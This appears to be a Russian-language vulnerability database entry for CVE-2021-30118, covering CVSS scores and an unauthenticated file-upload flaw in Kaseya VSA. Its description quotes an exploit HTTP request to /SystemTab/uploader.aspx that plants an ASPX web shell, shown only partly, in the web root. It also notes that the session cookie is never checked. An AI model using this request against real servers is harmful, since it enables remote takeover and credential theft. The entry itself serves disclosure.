CVE-2021-30118
Оценки
EPSS
Процентиль: 58.6%
CVSS
Оценка CVSS: 9.8/10
Все оценки CVSS
Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Разбор вектора
CVSS (Common Vulnerability Scoring System) вектор предоставляет детальные метрики о характеристиках уязвимости
CVSS
Вектор атаки
Сеть (N)
Описывает способ эксплуатации уязвимости
Сложность атаки
Низкая (L)
Описывает условия, не зависящие от атакующего
Требуемые привилегии
Отсутствуют (N)
Описывает уровень привилегий, которыми должен обладать атакующий
Взаимодействие с пользователем
Отсутствует (N)
Отражает требование участия человека в атаке
Область воздействия
Неизменная (U)
Определяет, влияет ли успешная атака на компоненты за пределами уязвимого компонента
Воздействие на конфиденциальность
Высокое (H)
Измеряет воздействие на конфиденциальность информации
Воздействие на целостность
Высокое (H)
Измеряет воздействие на целостность при успешной эксплуатации уязвимости
Воздействие на доступность
Высокое (H)
Измеряет воздействие на доступность затронутого компонента
Вектор: AV:N/AC:L/Au:N/C:C/I:C/A:C
Разбор вектора
CVSS (Common Vulnerability Scoring System) вектор предоставляет детальные метрики о характеристиках уязвимости
CVSS
Вектор атаки
Сеть (N)
Описывает способ эксплуатации уязвимости
Сложность атаки
Низкая (L)
Описывает условия, не зависящие от атакующего
Аутентификация
Отсутствуют (N)
Описывает уровень привилегий, которыми должен обладать атакующий
Воздействие на конфиденциальность
Complete
Измеряет воздействие на конфиденциальность информации
Воздействие на целостность
Complete
Измеряет воздействие на целостность при успешной эксплуатации уязвимости
Воздействие на доступность
Complete
Измеряет воздействие на доступность затронутого компонента
Описание
Злоумышленник может загружать файлы с привилегиями процесса веб-сервера для Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 и впоследствии использовать эти файлы для выполнения команд asp. API /SystemTab/uploader.aspx уязвим для неаутентифицированной произвольной загрузки файлов, приводящей к RCE. Злоумышленник может загружать файлы с привилегиями процесса веб-сервера и впоследствии использовать эти файлы для выполнения команд asp. Подробное описание: Дан следующий запрос: POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> Злоумышленник может контролировать имя файла, записываемого через параметр qqfile, и местоположение файла, записываемого через параметр PathData. Даже несмотря на то, что вызов требует передачи cookie sessionId, мы определили, что sessionId фактически не проверяется и любое числовое значение принимается как действительное. Обнаружены проблемы безопасности: * cookie sessionId требуется /SystemTab/uploader.aspx, но фактически не проверяется, что позволяет злоумышленнику обходить аутентификацию * /SystemTab/uploader.aspx позволяет злоумышленнику создавать файл с произвольным содержимым в любом месте, куда веб-сервер имеет доступ для записи * Процесс веб-сервера имеет доступ для записи в веб-корень, где злоумышленник может выполнить его, запросив URL-адрес вновь созданного файла. Воздействие: Эта произвольная загрузка файлов позволяет злоумышленнику размещать файлы по своему выбору в любом месте на жестком диске сервера, к которому имеет доступ процесс веб-сервера, включая (но не ограничиваясь) веб-корень. Если злоумышленник загружает файлы с кодом в веб-корень (например, код aspx), он может затем выполнить этот код в контексте веб-сервера, чтобы нарушить либо целостность, конфиденциальность, либо доступность системы, либо украсть учетные данные других пользователей. Другими словами, это может привести к полному компрометации системы.
Сканер-ВС 7 — современное решение для управления уязвимостями
Источники
CWE
Уязвимое ПО (1)
Тип: Конфигурация
Поставщик: *
Продукт: vsa
Операционная система: * * *
{ "cpe_match": [ { "cpe23uri": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*", "versionEndExcluding": "9.5.5", "vulnerable": true } ], "operator": "OR"}
Источник: nvd